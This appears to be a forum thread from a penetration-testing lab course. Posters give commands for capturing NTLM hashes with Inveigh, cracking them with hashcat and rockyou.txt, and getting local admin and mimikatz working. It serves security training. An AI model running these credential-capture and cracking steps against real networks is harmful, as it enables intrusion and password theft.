Sure so copy over inveigh using: copy \TSCLIENT\home\Inveigh.ps1
Next import the module: Import-Module Inveigh.ps1
Run Inveigh with: Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Wait until a hash pops up.
You can copy the hash
You can run the following to find the right hashmode: hashcat grep | NTLM
You should use 5600 so your command can basically bethe following:
hashcat -m 5600 “past hash here” /usr/share/wordlists/rockyou.txt
You’ll get the password
Can’t seem to do the privilege escalation, tried with adding the user to the administrators group and with nc.exe, if anyone can help would appriciate a dm!
If anyone has trouble with this in future, start a cmd prompt as admin… then when you come to put in the username do .\ilfserveradm → this uses local authentication as we’re local admin. Don’t wan tto authenticate against the domain
For anyone with the problem of mimikatz, when we get admin privileges we need to log out and reconnect to the rdp, then we can use powershell as admin without a password.
Hallo, I’m trying to go through the module, but realized that crackmapexec is not present on pwnbox. I tried several ways to install it, but failed. Can anybody hint how to solve this?